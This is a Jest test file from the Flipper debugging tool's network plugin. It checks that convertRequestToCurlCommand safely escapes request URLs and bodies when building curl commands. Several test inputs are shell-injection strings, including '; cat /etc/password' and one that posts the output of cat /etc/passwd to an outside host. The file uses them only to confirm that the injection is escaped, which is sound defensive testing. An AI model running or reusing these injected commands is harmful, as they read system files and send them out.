jens/flipper
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
23402dfff6be52b4019a15a482aeb657cb72dca9
flipper/desktop/plugins/public/network/__tests__/requestToCurlCommand.node.tsx
Michel Weststrate 23402dfff6 Convert network plugin to Sandy 
Summary:
converted the network plugin to use DataSource / DataTable. Restructured the storage to contain a single flat normalised object that will be much more efficient for rendering / filtering (as columns currently don't support nested keys yet, and lazy columns are a lot less flexible)

lint errors and further `flipper` package usages will be cleaned up in the next diff to make sure this diff doesn't become too large.

The rest of the plugin is converted in the next diff

Reviewed By: nikoant

Differential Revision: D27938581

fbshipit-source-id: 2e0e2ba75ef13d88304c6566d4519b121daa215b
2021-05-06 04:27:59 -07:00

149 lines
4.0 KiB
TypeScript
Raw Blame History

/**
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*
* @format
*/
import {convertRequestToCurlCommand} from '../utils';
test('convertRequestToCurlCommand: simple GET', () => {
const request = {
id: 'request id',
timestamp: 1234567890,
method: 'GET',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: undefined,
};
const command = convertRequestToCurlCommand(request);
expect(command).toEqual("curl -v -X GET 'https://fbflipper.com/'");
});
test('convertRequestToCurlCommand: simple POST', () => {
const request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: btoa('some=data&other=param'),
};
const command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/' -d 'some=data&other=param'",
);
});
test('convertRequestToCurlCommand: malicious POST URL', () => {
let request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: "https://fbflipper.com/'; cat /etc/password",
requestHeaders: [],
requestData: btoa('some=data&other=param'),
};
let command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST $'https://fbflipper.com/\\'; cat /etc/password' -d 'some=data&other=param'",
);
request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/"; cat /etc/password',
requestHeaders: [],
requestData: btoa('some=data&other=param'),
};
command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/\"; cat /etc/password' -d 'some=data&other=param'",
);
});
test('convertRequestToCurlCommand: malicious POST URL', () => {
let request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: "https://fbflipper.com/'; cat /etc/password",
requestHeaders: [],
requestData: btoa('some=data&other=param'),
};
let command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST $'https://fbflipper.com/\\'; cat /etc/password' -d 'some=data&other=param'",
);
request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/"; cat /etc/password',
requestHeaders: [],
requestData: btoa('some=data&other=param'),
};
command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/\"; cat /etc/password' -d 'some=data&other=param'",
);
});
test('convertRequestToCurlCommand: malicious POST data', () => {
let request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: btoa(
'some=\'; curl https://somewhere.net -d "$(cat /etc/passwd)"',
),
};
let command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/' -d $'some=\\'; curl https://somewhere.net -d \"$(cat /etc/passwd)\"'",
);
request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: btoa('some=!!'),
};
command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/' -d $'some=\\u21\\u21'",
);
});
test('convertRequestToCurlCommand: control characters', () => {
const request = {
id: 'request id',
timestamp: 1234567890,
method: 'GET',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: btoa('some=\u0007 \u0009 \u000C \u001B&other=param'),
};
const command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X GET 'https://fbflipper.com/' -d $'some=\\u07 \\u09 \\u0c \\u1b&other=param'",
);
});
Reference in New Issue View Git Blame Copy Permalink